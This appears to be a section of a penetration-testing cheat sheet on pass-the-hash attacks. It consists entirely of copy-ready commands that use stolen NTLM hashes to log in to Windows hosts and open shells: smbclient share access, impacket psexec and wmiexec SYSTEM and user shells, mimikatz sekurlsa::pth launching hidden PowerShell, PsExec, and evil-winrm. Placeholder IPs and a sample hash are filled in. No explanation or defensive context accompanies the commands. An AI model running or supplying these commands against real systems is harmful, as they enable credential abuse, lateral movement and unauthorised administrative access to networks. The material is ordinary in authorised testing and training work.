6. Pass-the-Hash


PtH Attack with SMBClient:

smbclient \\\\192.168.X.X\\secrets -U Administrator --pw-nt-hash <hash>

PtH NT_AUTHORITY Shell with PSExec:

impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.X.X

PtH User Shell with WMIExec:

impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.X.X

PtH with Mimikatz:

mimikatz sekurlsa::pth /user:Administrator /domain:. /ntlm:… /run:”powershell -w hidden”

Alt.
mimikatz sekurlsa::pth /user:Administrator /domain:. /ntlm:…
.\PsExec.exe \\172.23.1.100 cmd.exe

PtH with Evil-WinRM:

evil-winrm -i 192.168.X.X -u <user> -H <ntlm-hash>